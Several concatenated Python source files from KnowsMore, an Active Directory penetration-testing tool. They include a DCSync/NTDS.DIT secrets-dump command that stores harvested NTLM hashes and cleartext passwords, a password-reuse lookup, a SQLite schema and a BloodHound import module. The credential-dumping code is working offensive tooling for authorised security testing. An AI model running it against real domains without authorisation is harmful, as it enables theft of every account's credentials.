    def add_groups(self, parser: argparse.ArgumentParser):
        group = parser.add_argument_group('display options')
        group.add_argument('-just-dc-user', action='store', metavar='USERNAME',
                           help='Extract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach. '
                                'Implies also -just-dc switch')
        group.add_argument('-just-dc', action='store_true', default=False,
                           help='Extract only NTDS.DIT data (NTLM hashes and Kerberos keys)')
        group.add_argument('-just-dc-ntlm', action='store_true', default=False,
                           help='Extract only NTDS.DIT data (NTLM hashes only)')
        #group.add_argument('-pwd-last-set', action='store_true', default=False,
        #                   help='Shows pwdLastSet attribute for each NTDS.DIT account. Doesn\'t apply to -outputfile data')
        #group.add_argument('-user-status', action='store_true', default=False,
        #                   help='Display whether or not the user is disabled')
        #group.add_argument('-history', action='store_true', help='Dump password history, and LSA secrets OldVal')

        group = parser.add_argument_group('authentication')
        group.add_argument('-hashes', action="store", metavar="LMHASH:NTHASH",
                           help='NTLM hashes, format is LMHASH:NTHASH')
        group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
        group.add_argument('-k', action="store_true",
                           help='Use Kerberos authentication. Grabs credentials from ccache file '
                                '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use'
                                ' the ones specified in the command line')
        group.add_argument('-aesKey', action="store", metavar="hex key",
                           help='AES key to use for Kerberos Authentication'
                                ' (128 or 256 bits)')
        group.add_argument('-keytab', action="store", help='Read keys for SPN from keytab file')

        group = parser.add_argument_group('connection')
        group.add_argument('-dc-ip', action='store', metavar="ip address",
                           help='IP Address of the domain controller. If '
                                'ommited it use the domain part (FQDN) specified in the target parameter')
        group.add_argument('-target-ip', action='store', metavar="ip address",
                           help='IP Address of the target machine. If omitted it will use whatever was specified as target. '
                                'This is useful when target is the NetBIOS name and you cannot resolve it')

    def load_from_arguments(self, args: Namespace) -> bool:

        if args.target is None or args.target == '':
            Tools.mandatory()

        domain, username, password, remoteName = parse_target(args.target)

        if args.just_dc_user is not None:
            if args.use_vss is True:
                Logger.pl('{!} {R}error: -just-dc-user switch is not supported in VSS mode{W}\r\n')
                Tools.exit_gracefully(1)
            elif args.resumefile is not None:
                Logger.pl('{!} {R}error: resuming a previous NTDS.DIT dump session not compatible with -just-dc-user switch{W}\r\n')
                Tools.exit_gracefully(1)
            elif remoteName.upper() == 'LOCAL' and username == '':
                Logger.pl(
                    '{!} {R}error: -just-dc-user not compatible in LOCAL mode{W}\r\n')
                Tools.exit_gracefully(1)
            else:
                # Having this switch on implies not asking for anything else.
                args.just_dc = True

        if args.use_vss is True and args.resumefile is not None:
            Logger.pl(
                '{!} {R}error: resuming a previous NTDS.DIT dump session is not supported in VSS mode{W}\r\n')
            Tools.exit_gracefully(1)

        if args.use_keylist is True and (args.rodcNo is None or args.rodcKey is None):
            Logger.pl(
                '{!} {R}error: Both the RODC ID number and the RODC key are required for the Kerb-Key-List approach{W}\r\n')
            Tools.exit_gracefully(1)

        if remoteName.upper() == 'LOCAL' and username == '' and args.resumefile is not None:
            Logger.pl(
                '{!} {R}error: resuming a previous NTDS.DIT dump session is not supported in LOCAL mode{W}\r\n')
            Tools.exit_gracefully(1)

        if remoteName.upper() == 'LOCAL' and username == '':
            if args.system is None and args.bootkey is None:
                Logger.pl(
                    '{!} {R}error: Either the SYSTEM hive or bootkey is required for local parsing, check help{W}\r\n')
                Tools.exit_gracefully(1)

        else:

            if args.target_ip is None:
                args.target_ip = remoteName

            if domain is None:
                domain = ''

            if args.keytab is not None:
                Keytab.loadKeysFromKeytab(args.keytab, username, domain, args)
                args.k = True

            if password == '' and username != '' and args.hashes is None and args.no_pass is False and args.aesKey is None:
                from getpass import getpass

                password = getpass("Password:")

            if args.aesKey is not None:
                args.k = True

        if remoteName is None or remoteName == '':
            Tools.mandatory()

        self.remoteName = remoteName
        self.username = username
        self.password = password
        self.domain = domain
        self.options = args

        self.db = self.open_db(args)

        return True

    def run(self):
        self.ct_count = self.nt_count = 0
        try:
            #logging.getLogger().setLevel(logging.DEBUG)
            # Print the Library's installation path
            #logging.debug(version.getInstallationPath())

            Color.pl('{?} {W}{D}Starting, wait...{W}')
            dumper = DumpSecrets(self.remoteName,
                                 self.username,
                                 self.password,
                                 self.domain,
                                 self.options,
                                 self.__secret_callback)
            dumper.dump()
        except KeyboardInterrupt as e:
            raise e
        except Exception as e:
            Tools.clear_line()
            raise e
        finally:
            Tools.clear_line()

    def __secret_callback(self, secret_type, secret):

        if self.nt_count < 0xf or self.nt_count & 0xf == 0:
            sys.stderr.write("\033[K")
            print((" Importing: NTDS => %d, Clear text => %d" % (self.nt_count, self.ct_count)), end='\r', flush=True, file=sys.stderr)

        if secret_type == NTDSHashes.SECRET_TYPE.NTDS:
            if not isinstance(secret, NTDSUserAccount):
                Logger.pl('{!} {R}error: NTDS hash format is invalid: {O}%s{R}\r\n' % secret)
                Tools.exit_gracefully(1)

            # Ignore history
            if secret.history == -1:
                self.nt_count += 1
                self.add_credential(secret.domain, secret.user_name, secret.nt_hash)

        elif secret_type == NTDSHashes.SECRET_TYPE.NTDS_KERBEROS:
            Color.pl('{?} {W}{D}Kerberos: {G}%s{W}' % secret)

        elif secret_type == NTDSHashes.SECRET_TYPE.NTDS_CLEARTEXT:
            if not isinstance(secret, NTDSUserAccount):
                Logger.pl('{!} {R}error: NTDS_CLEARTEXT hash format is invalid: {O}%s{R}\r\n' % secret)
                Tools.exit_gracefully(1)

            self.ct_count += 1

            pwd = Password(
                ntlm_hash='',
                clear_text=secret.clear_text
            )

            self.add_credential(secret.domain, secret.user_name, pwd.ntlm_hash)

            pdata = {}
            if len(Configuration.company) > 0:
                pdata['company_similarity'] = sorted(
                    [pwd.calc_ratio(n1) for n1 in Configuration.company]
                )[-1]

            self.db.insert_password_manually(pwd, **pdata)

        else:
            print(secret_type)
            print(secret)
            raise Exception('Implement!')

    def add_credential(self, domain, name, hash, rid: str = '', sid: str = ''):

        domain_id = -1
        name = name.lower()
        bloodhound_object = None
        label = ''

        # find by object id
        if sid is not None and sid.strip() != '' and len(sid) > 30 and sid[0:2].upper() == "S-":
            tmp = sid.split("-")
            if len(tmp) >= 5:
                # Temos um possível SID válido
                if tmp[-1].upper() == rid.upper():
                    domainsid = sid[:-1]
                    d = self.db.select_raw(
                        sql="select domain_id from domains as d "
                            "where object_identifier = ?",
                        args=[domainsid.upper()]
                    )
                    if len(d) == 1:  # Not permit duplicity
                        domain_id = d[0]['domain_id']

                    obj = self.db.select_raw(
                        sql="select props, name, object_label from bloodhound_objects as o "
                            "where object_id = ? "
                            "and object_label in ('User', 'Computer')",
                        args=[sid]
                    )
                    if len(obj) == 1:  # Not permit duplicity
                        try:
                            bloodhound_object = json.loads(obj[0]['props'])
                            label = obj[0]['object_label']
                        except:
                            pass

        # find by r_id and name
        if bloodhound_object is None and rid is not None and rid.strip() != '':
            s_name = name
            if s_name.endswith('$'):
                s_name = s_name[:-1]
            obj = self.db.select_raw(
                sql="select props, name, object_label from bloodhound_objects as o "
                    "where r_id = ? and name = ? "
                    "and object_label in ('User', 'Computer')",
                args=[rid, s_name.upper()]
            )
            if len(obj) == 1:  # Not permit duplicity
                try:
                    bloodhound_object = json.loads(obj[0]['props'])
                    label = obj[0]['object_label']
                except:
                    pass

        type = 'U'
        if bloodhound_object is not None:
            p_name = bloodhound_object.get('name', '').lower()
            p_domain = bloodhound_object.get('domain', '').lower()
            p_domainsid = bloodhound_object.get('domainsid', '').upper()
            p_name = p_name.replace(f'@{p_domain}', '').replace(f'.{p_domain}', '')
            p_dn = bloodhound_object.get('distinguishedname', '')
            p_sid = bloodhound_object.get('source', '')
            p_full_name = bloodhound_object.get('displayname', '')
            p_pwd_last_set = datetime.datetime.fromtimestamp(bloodhound_object.get('pwdlastset', 0))
            p_enabled = bool(bloodhound_object.get('enabled', True))
            type = 'M' if label.lower() == 'machine' else 'U'
            if p_name == name:
                if domain_id == -1:
                    domain_id = self.get_domain(
                        name=domain,
                        object_identifier=p_domainsid
                    )
                if domain_id != -1:
                    self.db.insert_or_update_credential(
                        domain=domain_id,
                        username=name,
                        ntlm_hash=hash,
                        type=type,
                        dn=p_dn,
                        full_name=p_full_name,
                        object_identifier=p_sid,
                        pwd_last_set=p_pwd_last_set,
                        enabled=p_enabled
                    )
                    return

        # o processo via bloodhound, não deu certo, vamos para o fallback então
        #print(name, rid, sid)
        if name.endswith('$'):
            name = name[:-1]
            type = 'M'

        if name == '' or hash == '':
            return

        if domain == '':
            domain = 'default'

        # try to locate this host previously imported by BloodHound
        domain_id = -1
        if domain == 'default':
            d = self.db.select_raw(
                sql="select c.domain_id from credentials as c "
                    "where name = ? and domain_id <> 1 and type = ?",
                args=[name, type]
            )
            if len(d) == 1:  # Not permit duplicity
                domain_id = d[0]['domain_id']

        if domain_id == -1:
            domain_id = self.get_domain(domain)

        if domain_id == -1:
            Tools.clear_line()
            Logger.pl('{!} {R}error: Was not possible to import the domain {O}%s{R}\r\n' % domain)
            Tools.exit_gracefully(1)

        self.db.insert_or_update_credential(
            domain=domain_id,
            username=name,
            ntlm_hash=hash,
            type=type,
        )

    def get_domain(self, name: str, object_identifier: str = '') -> int:

        name = name.lower()

        if name in self.domain_cache:
            return self.domain_cache[name]

        domain_id = self.db.insert_or_get_domain(
            domain=name,
            object_identifier=object_identifier
        )

        if domain_id == -1:
            raise Exception('Unable to get/create domain from Name: %s' % name)

        self.domain_cache[name] = domain_id

        return domain_id



import errno
import os
import re
import sqlite3
import time
from argparse import _ArgumentGroup, Namespace
from enum import Enum
from clint.textui import progress

from knowsmore.cmdbase import CmdBase
from knowsmore.config import Configuration
from knowsmore.password import Password
from knowsmore.util.color import Color
from knowsmore.util.database import Database
from knowsmore.util.logger import Logger
from knowsmore.util.tools import Tools


class UserPass(CmdBase):
    db = None
    password = None
    username = None

    def __init__(self):
        super().__init__('user-pass', 'Add user password')

    def add_flags(self, flags: _ArgumentGroup):
        pass

    def add_commands(self, cmds: _ArgumentGroup):

        cmds.add_argument('--username',
                          action='store',
                          metavar='[username]',
                          type=str,
                          default='',
                          dest=f'username',
                          help=Color.s('Username'))

        cmds.add_argument('--password',
                          action='store',
                          metavar='[clear text password]',
                          type=str,
                          default='',
                          dest=f'password',
                          help=Color.s('Clear text password'))

    def load_from_arguments(self, args: Namespace) -> bool:

        if args.password.strip() == '' or args.username.strip() == '':
            Tools.mandatory()

        self.username = args.username.strip().lower()

        self.password = Password(
            ntlm_hash='',
            clear_text=args.password
        )

        self.db = self.open_db(args)

        return True

    def run(self):

        sql = (
            'select c.credential_id, c.name, c.type from credentials as c '
            ' where c.name like ? '
            ' order by c.name'
        )
        args = [f'%{self.username}%']

        rows = self.db.select_raw(
            sql=sql,
            args=args
        )

        if len(rows) == 0:
            Logger.pl('{!} {O}User "{G}%s{O}" not found{W}\r\n' % self.username)
            exit(0)

        if len(rows) > 1:
            Logger.pl('{!} {O}More than one User found with this text. Please adjust your query{W}\r\n')
            print(Tools.get_tabulated(rows))
            exit(0)

        credential_id = rows[0]['credential_id']

        sql = (
            'select c.* from credentials as c '
            ' where c.credential_id == ?'
        )

        rows = self.db.select_raw(
            sql=sql,
            args=[credential_id]
        )

        pdata = {}

        if len(Configuration.company) > 0:
            pdata['company_similarity'] = sorted(
                        [self.password.calc_ratio(n1) for n1 in Configuration.company]
                    )[-1]
            Logger.pl('{+} {C}Calculated company name similarity: {O}%s{W}' % pdata['company_similarity'])

        self.db.insert_or_update_credential(
            domain=rows[0]['domain_id'],
            username=rows[0]['name'],
            ntlm_hash=self.password.ntlm_hash,
            type='U',
        )

        self.db.insert_password_manually(self.password, **pdata)
        Logger.pl('{+} {C}Password inserted/updated{W}')

        print(' ')
        Color.pl('{?} {W}{D}Password data:{W}')
        print(self.password)

        Color.pl('{?} {W}{D}Looking for other users with the same password...{W}')

        sql = (
            'select c.credential_id, c.name, c.type, c.object_identifier, c.dn, d.domain_id, d.name as domain_name, d.object_identifier as domain_object_identifier, '
            'd.dn as domain_dn, p.password, p.ntlm_hash, p.md5_hash, p.sha1_hash, p.sha256_hash, p.sha512_hash '
            'from credentials as c '
            'inner join passwords as p '
            'on c.password_id = p.password_id '
            'inner join domains as d '
            'on c.domain_id = d.domain_id '
            ' where p.ntlm_hash like ? and c.credential_id != ?'
            ' order by c.name'
        )
        args = [self.password.ntlm_hash, credential_id]

        rows = self.db.select_raw(
            sql=sql,
            args=args
        )

        if len(rows) == 0:
            Logger.pl('{?} {G}Password/hash inserted but did not find other user with this password{W}\r\n')
            exit(0)

        print(Tools.get_tabulated(rows))

        Logger.pl('{+} {O}%s{W}{C} register found{W}' % len(rows))


__version__ = '0.1.40'
__title__ = "knowsmore"
__description__ = "KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes, BloodHound, NTDS and DCSync)."
__url__ = "https://github.com/helviojunior/knowsmore"
__build__ = 0x63c974a8
__author__ = "Helvio Junior  (M4v3r1ck)"
__author_email__ = "helvio.junior@sec4us.com.br"
__license__ = "GPL-3.0"
__copyright__ = "Copyright Helvio Junior"



#!/usr/bin/python3
# -*- coding: UTF-8 -*-
import datetime
import sys, os.path
import sqlite3
import string, base64
import json
import hashlib
from sqlite3 import Connection, OperationalError, IntegrityError, ProgrammingError

from .color import Color
from .database import Database
from ..password import Password


class KnowsMoreDB(Database):
    dbName = ""

    def __init__(self, auto_create=True, db_name=None):

        if db_name is None:
            db_name = "knowsmore.db"

        super().__init__(
            auto_create=auto_create,
            db_name=db_name
        )
        self.fill_data()

    def has_data(self) -> bool:
        return self.select_count('passwords') > 0

    def check_open(self) -> bool:
        return self.select_count('passwords') >= 0

    def insert_group(self, domain: int, object_identifier: str, name: str, dn: str = '', members: str = '',
                     membership: str = '') -> int:

        if domain == -1:
            raise Exception('Invalid domain')

        if object_identifier is None or object_identifier.strip() == '':
            raise Exception('object_identifier cannot be empty')

        #grp = self.select('groups',
        #                  object_identifier=object_identifier
        #                  )

        #if len(grp) == 0:
        #    self.insert_one('groups',
        self.insert_update_one('groups',
                               domain_id=domain,
                               name=name,
                               object_identifier=object_identifier,
                               dn=dn,
                               members=members,
                               membership=membership
                               )

    def update_password(self, password: Password, **kwargs):

        filter_data = {
            'ntlm_hash': password.ntlm_hash,
        }

        pwd = {
            'password': password.clear_text,
            'length': password.length,
            'entropy': password.entropy,
            'strength': password.strength,
            'upper': password.upper,
            'lower': password.lower,
            'digit': password.digit,
            'special': password.special,
            'latin': password.latin,
            'md5_hash': password.md5_hash,
            'sha1_hash': password.sha1_hash,
            'sha256_hash': password.sha256_hash,
            'sha512_hash': password.sha512_hash,
        }

        pwd.update(kwargs)

        self.update('passwords', filter_data, **pwd)

        # Get all credentials (user/computer) using this password
        credentials = self.select_raw(
            sql='select distinct c.credential_id, c.name, c.full_name, c.user_data_similarity from credentials as c '
                'inner join passwords as p on c.password_id = p.password_id '
                'where c.type = "U" '
                'and c.full_name != "" '
                'and p.ntlm_hash = ?',
            args=[password.ntlm_hash]
        )
        for c in credentials:
            names = [
                n.lower() for n in c['full_name'].split(' ')
                if len(n) > 3
            ]
            score = sorted(
                [password.calc_ratio(n) for n in names]
            )[-1]
            if int(c['user_data_similarity']) != int(score):
                self.update('credentials',
                            filter_data={'credential_id': c['credential_id']},
                            user_data_similarity=score
                            )

    def insert_password_manually(self, password: Password, **kwargs):

        self.insert_ignore_one('pre_computed',
                               ntlm_hash=password.ntlm_hash,
                               password=password.clear_text if password.length > 0 else ''
                               )

        self.update_password(password, **kwargs)

        self.insert_update_one('pre_computed',
                               ntlm_hash=password.ntlm_hash,
                               md5_hash=password.md5_hash,
                               sha1_hash=password.sha1_hash,
                               sha256_hash=password.sha256_hash,
                               sha512_hash=password.sha512_hash,
                               password=password.clear_text,
                               )

    def insert_or_update_bloodhound_object(self, label: str, object_id: str, filter_type: str = 'objectid',  **props):

        object_id = object_id.upper()

        name = props.get('name', '')
        domain = props.get('domain', '').upper()
        name = name.replace(f'@{domain}', '').replace(f'.{domain}', '')

        rid = ''
        if object_id[0:2] == "S-" and \
                (label.lower() == 'group' or label.lower() == 'user' or label.lower() == 'machine'):
            rid = object_id.split('-')[-1]

        self.insert_update_one(
            'bloodhound_objects',
            object_id=object_id,
            filter_type=filter_type,
            object_label=label,
            name=name,
            r_id=rid,
            props=json.dumps(props)
        )

    def insert_or_update_bloodhound_edge(self, source: str, target: str, source_label: str, target_label: str,
                                         edge_type: str, edge_props: str, filter_type: str = 'objectid',
                                         props: dict = {}):

        txt_props = json.dumps(props)
        checksum = hashlib.md5(
            f'{source_label}:{target_label}:{edge_type}:{source}:{target}:{txt_props}'.encode("UTF-8")
        ).hexdigest().lower()

        data = dict(
            edge_id=checksum,
            source_id=source,
            destination_id=target,
            edge_props=edge_props,
            source_label=source_label,
            target_label=target_label,
            edge_type=edge_type,
            source_filter_type=filter_type,
            updated_date=datetime.datetime.utcnow(),
            props=txt_props
        )

        self.insert_update_one('bloodhound_edge', **data)

        from ..config import Configuration
        from .tools import Tools
        if Configuration.verbose >= 4:
            Color.pl('{*} {O}insert_or_update_bloodhound_edge: {G}%s{W}{D}{W}' % (
                json.dumps(data, default=Tools.json_serial)))

    def insert_or_update_credential(self, domain: int, username: str, ntlm_hash: str,
                                    dn: str = '', groups: str = '', object_identifier: str = '',
                                    type: str = 'U', full_name: str = '', enabled: bool = True,
                                    pwd_last_set: datetime.datetime = datetime.datetime(1970, 1, 1, 0, 0, 0, 0)):
        try:

            # Hard-coded empty password
            update_password = True
            if ntlm_hash is None or ntlm_hash.strip() == '':
                update_password = False
                ntlm_hash = '31d6cfe0d16ae931b73c59d7e0c089c0'

            passwd = self.select_first('passwords', ntlm_hash=ntlm_hash)
            password_id = -1 if passwd is None else passwd['password_id']

            if password_id == -1:
                self.insert_one('passwords', domain_id=domain, ntlm_hash=ntlm_hash)

                passwd = self.select_first('passwords', ntlm_hash=ntlm_hash)
                password_id = -1 if passwd is None else passwd['password_id']

            if password_id == -1:
                raise Exception('Password not found at database')

            data = {
                'domain_id': domain,
                'name': username,
                'type': type,
                'enabled': enabled,
                'password_id': password_id
            }
            if full_name is not None:
                data['full_name'] = full_name
            if dn is not None:
                data['dn'] = dn
            if groups is not None:
                data['groups'] = groups
            if object_identifier is not None:
                data['object_identifier'] = object_identifier
            if pwd_last_set is not None and pwd_last_set.year > 1970:
                data['pwd_last_set'] = pwd_last_set

            self.insert_update_one_exclude('credentials',
                                           exclude_on_update=['password_id'] if not update_password else [],
                                           **data)

        except Exception as e:
            Color.pl('{!} {R}Error inserting credential data:{O} %s{W}' % str(e))
        pass

    def insert_or_get_domain(self, domain: str, dn: str = '', object_identifier: str = '') -> int:

        if domain is None or domain.strip() == '':
            raise Exception('Domain cannot be empty')

        domain = domain.lower()
        dn = '' if dn is None else dn.lower()
        object_identifier = '' if object_identifier is None else object_identifier.strip()

        f = {
            '__operator': 'or',
            'name': domain.lower()
        }
        if dn is not None and dn != '':
            f['dn'] = dn

        if f is None and object_identifier is not None and object_identifier != '':
            f['object_identifier'] = object_identifier

        domain_id = self.get_domain(**f)

        if domain_id == -1:
            data = {
                'name': domain.lower()
            }

            if dn is not None and dn != '':
                data['dn'] = dn

            if object_identifier is not None and object_identifier != '':
                data['object_identifier'] = object_identifier

            self.insert_ignore_one('domains', **data)

            domain_id = self.get_domain(**f)

        else:
            data = {
                'name': domain.lower()
            }

            if dn is not None and dn != '':
                data['dn'] = dn

            if object_identifier is not None and object_identifier != '':
                data['object_identifier'] = object_identifier

            self.update('domains', {'domain_id': domain_id}, **data)

        return domain_id

    def get_domain(self, **kwargs) -> int:
        dom = self.select_first('domains', **kwargs)
        return dom.get('domain_id', None) if dom is not None else -1

    def fill_data(self):
        if not self.has_data():
            # Create default empty password hash
            self.insert_ignore_one('passwords',
                                   ntlm_hash='31d6cfe0d16ae931b73c59d7e0c089c0',
                                   password='(empty)'
                                   )

    def create_db(self):

        conn = self.connect_to_db(check=False)

        # definindo um cursor
        cursor = conn.cursor()

        # criando a tabela (schema)
        cursor.execute("""
            CREATE TABLE IF NOT EXISTS [domains] (
                domain_id INTEGER PRIMARY KEY AUTOINCREMENT,
                name TEXT NOT NULL,
                object_identifier TEXT NOT NULL DEFAULT(''),
                dn TEXT NOT NULL DEFAULT(''),
                UNIQUE(name)
            );
        """)

        # criando a tabela (schema)
        cursor.execute("""
            CREATE TABLE IF NOT EXISTS [passwords] (
                password_id INTEGER PRIMARY KEY AUTOINCREMENT,
                domain_id INTEGER NOT NULL,
                ntlm_hash TEXT NOT NULL,
                md5_hash TEXT NOT NULL DEFAULT(''),
                sha1_hash TEXT NOT NULL DEFAULT(''),
                sha256_hash TEXT NOT NULL DEFAULT(''),
                sha512_hash TEXT NOT NULL DEFAULT(''),
                password TEXT NOT NULL DEFAULT(''),
                entropy INTEGER NOT NULL DEFAULT(0),
                strength INTEGER NOT NULL DEFAULT(0),
                length INTEGER NOT NULL DEFAULT(0),
                upper INTEGER NOT NULL DEFAULT(0),
                lower INTEGER NOT NULL DEFAULT(0),
                digit INTEGER NOT NULL DEFAULT(0),
                special INTEGER NOT NULL DEFAULT(0),
                latin INTEGER NOT NULL DEFAULT(0),
                company_similarity INTEGER NOT NULL DEFAULT(0),
                UNIQUE(domain_id, ntlm_hash)
            );
        """)

        cursor.execute("""
            CREATE TABLE IF NOT EXISTS [credentials] (
                credential_id INTEGER PRIMARY KEY AUTOINCREMENT,
                domain_id INTEGER NOT NULL,
                type varchar(1) NOT NULL  DEFAULT('U'),
                name varchar(500) NOT NULL,
                full_name TEXT NOT NULL DEFAULT(''),
                object_identifier TEXT NOT NULL DEFAULT(''),
                dn TEXT NOT NULL DEFAULT(''),
                groups TEXT NOT NULL DEFAULT(''),
                password_id INTEGER NOT NULL,
                user_data_similarity INTEGER NOT NULL DEFAULT(0),
                enabled INTEGER NOT NULL DEFAULT(1),
                pwd_last_set datetime NULL,
                insert_date datetime NOT NULL DEFAULT (datetime('now','localtime')),
                FOREIGN KEY(domain_id) REFERENCES domains(domain_id),
                FOREIGN KEY(password_id) REFERENCES passwords(password_id),
                UNIQUE(domain_id, name)
            );
        """)

        cursor.execute("""
            CREATE TABLE IF NOT EXISTS [groups] (
                group_id INTEGER PRIMARY KEY AUTOINCREMENT,
                domain_id INTEGER NOT NULL,
                name varchar(500) NOT NULL,
                object_identifier TEXT NOT NULL,
                dn TEXT NOT NULL,
                members TEXT NOT NULL DEFAULT(''),
                membership TEXT NOT NULL DEFAULT(''),
                FOREIGN KEY(domain_id) REFERENCES domains(domain_id),
                UNIQUE(name, object_identifier)
            );
        """)

        # criando a tabela (schema)
        cursor.execute("""
                    CREATE TABLE IF NOT EXISTS [pre_computed] (
                        password_id INTEGER PRIMARY KEY AUTOINCREMENT,
                        ntlm_hash TEXT NOT NULL,
                        md5_hash TEXT NOT NULL DEFAULT(''),
                        sha1_hash TEXT NOT NULL DEFAULT(''),
                        sha256_hash TEXT NOT NULL DEFAULT(''),
                        sha512_hash TEXT NOT NULL DEFAULT(''),
                        password TEXT NOT NULL,
                        UNIQUE(ntlm_hash)
                    );
                """)

        cursor.execute("""
                    CREATE TABLE IF NOT EXISTS [bloodhound_objects] (
                        object_id TEXT NOT NULL,
                        r_id TEXT NOT NULL DEFAULT(''),
                        object_label TEXT NOT NULL,
                        filter_type TEXT NOT NULL DEFAULT('objectid'),
                        name TEXT NOT NULL DEFAULT(''),
                        props TEXT NOT NULL DEFAULT(''),
                        insert_date datetime not null DEFAULT(strftime('%Y-%m-%d %H:%M:%f', 'NOW', 'localtime')),
                        updated_date datetime not null DEFAULT(strftime('%Y-%m-%d %H:%M:%f', 'NOW', 'localtime')),
                        sync_date datetime not null DEFAULT ('1970-01-01'),
                        UNIQUE(object_id, object_label)
                    );
                """)

        conn.commit()

        cursor.execute("""
                    CREATE INDEX idx_bloodhound_objects_id_label
                    ON bloodhound_objects (object_id, object_label);
                """)

        conn.commit()

        cursor.execute("""
                    CREATE INDEX idx_bloodhound_objects_sync_date
                    ON bloodhound_objects (sync_date);
                """)

        conn.commit()

        cursor.execute("""
                    CREATE INDEX idx_bloodhound_objects_sync_updated_date
                    ON bloodhound_objects (sync_date, updated_date);
                """)

        conn.commit()

        cursor.execute("""
                    CREATE TABLE IF NOT EXISTS [bloodhound_edge] (
                        edge_id TEXT NOT NULL,
                        source_id TEXT NOT NULL,
                        destination_id TEXT NOT NULL,
                        source_label TEXT NOT NULL,
                        target_label TEXT NOT NULL,
                        edge_type TEXT NOT NULL DEFAULT(''),
                        edge_props TEXT NOT NULL DEFAULT(''),
                        source_filter_type TEXT NOT NULL DEFAULT('objectid'),
                        props TEXT NOT NULL DEFAULT(''),
                        insert_date datetime not null DEFAULT(strftime('%Y-%m-%d %H:%M:%f', 'NOW', 'localtime')),
                        updated_date datetime not null DEFAULT(strftime('%Y-%m-%d %H:%M:%f', 'NOW', 'localtime')),
                        sync_date datetime not null DEFAULT ('1970-01-01'),
                        UNIQUE(edge_id)
                    );
                """)

        conn.commit()

        cursor.execute("""
                    CREATE UNIQUE INDEX idx_bloodhound_edge_edge_id 
                    ON bloodhound_edge (edge_id);
                """)

        conn.commit()

        cursor.execute("""
                    CREATE INDEX idx_bloodhound_edge_updated_date
                    ON bloodhound_edge (updated_date);
                """)

        conn.commit()

        cursor.execute("""
                    CREATE INDEX idx_bloodhound_edge_sync_updated_date
                    ON bloodhound_edge (sync_date, updated_date);
                """)

        conn.commit()

        cursor.execute("""
            INSERT INTO [domains](name) values('default');
        """)

        conn.commit()

        #Must get the constraints
        self.get_constraints()



# BloodHound Sources
#  https://github.com/BloodHoundAD/BloodHound/blob/master/src/js/newingestion.js
#  https://github.com/BloodHoundAD/BloodHound/blob/master/src/js/utils.js
#

import datetime
import errno
import json
import os
import queue
import re
import shutil
import sqlite3
import threading
import time
import mimetypes
import tempfile
import logging
from enum import Enum
from pathlib import Path
from zipfile import ZipFile
from argparse import _ArgumentGroup, Namespace
from clint.textui import progress
from neo4j import GraphDatabase, exceptions, Session, Transaction
from neo4j.exceptions import ClientError
from neo4j.meta import ExperimentalWarning
import warnings

from knowsmore.cmdbase import CmdBase
from knowsmore.config import Configuration
from knowsmore.libs.bloodhoundsync import BloodhoundSync
from knowsmore.password import Password
from knowsmore.util.color import Color
from knowsmore.util.database import Database
from knowsmore.util.logger import Logger
from knowsmore.util.tools import Tools

warnings.filterwarnings("ignore", category=ExperimentalWarning)


class Bloodhound(CmdBase):
    class ImportMode(Enum):
        Undefined = 0
        Import = 1
        MarkOwned = 2
        Sync = 3

    filename = ''
    db = None
    chain_enabled = False
    domain_cache = {}
    mode = ImportMode.Undefined
    synced = []
    tasks = 6

    class BloodhoundFile:
        file_name = None
        type = 'unknown'
        items = 0
        version = 0
        order = 99999
        bh_connection = None

        def __init__(self, file_name: str):
            self.file_name = file_name

            try:
                #json_data = self.get_json()

                meta = self.get_meta()
                self.type = meta.get('type', 'unknown').lower()
                self.items = meta.get('count', 0)
                self.version = meta.get('version', 0)

                if self.type == "domains":
                    self.order = 1
                elif self.type == "groups":
                    self.order = 2
                elif self.type == "computers":
                    self.order = 3
                elif self.type == "users":
                    self.order = 4

                if Configuration.verbose >= 2:
                    Color.pl('{*} {W}{D}%s: type {G}%s{W}{D}, version {G}%d{W}' % (
                        self.file_name, self.type, self.version))

            except KeyboardInterrupt as e:
                raise e
            except:
                pass

        def get_meta(self):
            with open(self.file_name, 'rb') as js:
                # Obtain meta tag
                js.seek(-0x100, os.SEEK_END)
                lastbytes = str(js.read(0x100), 'utf-8').strip()
                metatagstr = re.search(r'"meta":\s*{(?:.|\n)*?}', lastbytes, re.MULTILINE | re.IGNORECASE).group(0)
                metatag = json.loads('{' + metatagstr + '}')
                return metatag.get('meta', {})

        def get_json(self):
            try:
                with open(self.file_name, 'r', encoding="UTF-8", errors="surrogateescape") as f:
                    return json.load(f)
            except json.decoder.JSONDecodeError as e:
                if 'utf-8-sig' in str(e):
                    with open(self.file_name, 'r', encoding="utf-8-sig", errors="surrogateescape") as f:
                        return json.load(f)
                else:
                    with open(self.file_name, 'r', encoding="latin-1", errors="surrogateescape") as f:
                        return json.load(f)

    class BloodHoundVersion:
        major = 0
        minor = 0
        release = ''
        name = ''
        edition = ''

        def __init__(self, name: str, edition: str, version: str):
            from pkg_resources import parse_version

            v = parse_version(version)

            self.major = v.major
            self.minor = v.minor
            self.release = version.replace(f"{self.major}.{self.minor}", "").strip(". ")
            self.name = name
            self.edition = edition

        def __str__(self):
            return f"{self.name} {self.edition} v{self.major}.{self.minor}.{self.release}"

    class BloodHoundConnection:

        database = None
        version = None
        groups = {}

        def __init__(self, uri, user, password, database):
            self.driver = GraphDatabase.driver(uri, auth=(user, password))
            try:
                self.driver.verify_connectivity()

                self.version = self.get_version()

            except exceptions.ServiceUnavailable as e:
                raise e
            except exceptions.AuthError as e:
                raise e
            except Exception as e:
                #print(e.__class__)
                raise e

            self.database = database
            self.groups = {}

        def close(self):
            self.driver.close()

        def get_all_owned(self) -> list:
            with self.driver.session(database=self.database) as session:
                return session.execute_read(self._get_owned)

        def set_owned(self, source_filter_type: str, source_label: str, source:str, owned: bool = True):
            with self.driver.session(database=self.database) as session:
                return session.execute_write(self._set_owned, source_filter_type, source_label, source, owned)

        def get_session(self) -> Session:
            return self.driver.session(database=self.database)

        @staticmethod
        def execute(tx: Transaction, query, **data):
            tx.run(query, **data)

        @staticmethod
        def _get_owned(tx: Transaction):
            accounts = []
            result = tx.run("MATCH (n) WHERE n.owned IS NOT NULL RETURN n.name as name, n.owned as owned")
            for record in result:
                accounts.append(
                    {
                        'name': record.get("name", None),
                        'owned': record.get("owned", None),
                    }
                )
            return accounts

        @staticmethod
